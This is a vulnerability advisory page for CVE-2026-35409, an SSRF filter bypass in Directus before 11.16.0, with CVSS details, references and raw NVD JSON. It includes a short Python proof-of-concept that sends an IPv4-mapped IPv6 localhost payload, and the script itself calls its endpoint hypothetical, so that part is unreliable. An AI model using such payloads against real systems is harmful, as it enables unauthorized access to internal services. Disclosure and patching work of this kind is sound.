CVE-2026-35409

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.0, a Server-Side Request Forgery (SSRF) protection bypass has been identified and fixed in Directus. The IP address validation mechanism used to block requests to local and private networks could be circumvented using IPv4-Mapped IPv6 address notation. This vulnerability is fixed in 11.16.0.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE

Directus < 11.16.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Example of a vulnerable Directus instance)
target_url = "http://vulnerable-directus-instance.com"

# Payload: Using IPv4-mapped IPv6 address to bypass SSRF check and access localhost
# Mapping 127.0.0.1 to IPv6 format: ::ffff:127.0.0.1
ssrf_payload = "http://[::ffff:127.0.0.1]:8080/admin" 

# Example endpoint that might be vulnerable (hypothetical based on product type)
vulnerable_endpoint = f"{target_url}/items/proxy?url={ssrf_payload}"

try:
    response = requests.get(vulnerable_endpoint)
    if response.status_code == 200:
        print("Potential SSRF bypass successful!")
        print("Response snippet:", response.text[:200])
    else:
        print(f"Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-35409
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-35409
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-35409/
[4] VulDB https://vuldb.com/cve/CVE-2026-35409
[5] https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-35409", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:21.930", "lastModified": "2026-04-20T16:47:30.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.0, a Server-Side Request Forgery (SSRF) protection bypass has been identified and fixed in Directus. The IP address validation mechanism used to block requests to local and private networks could be circumvented using IPv4-Mapped IPv6 address notation. This vulnerability is fixed in 11.16.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.16.0", "matchCriteriaId": "7287D07A-7E71-4728-8CEE-E6E450B34316"}]}]}], "references": [{"url": "https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}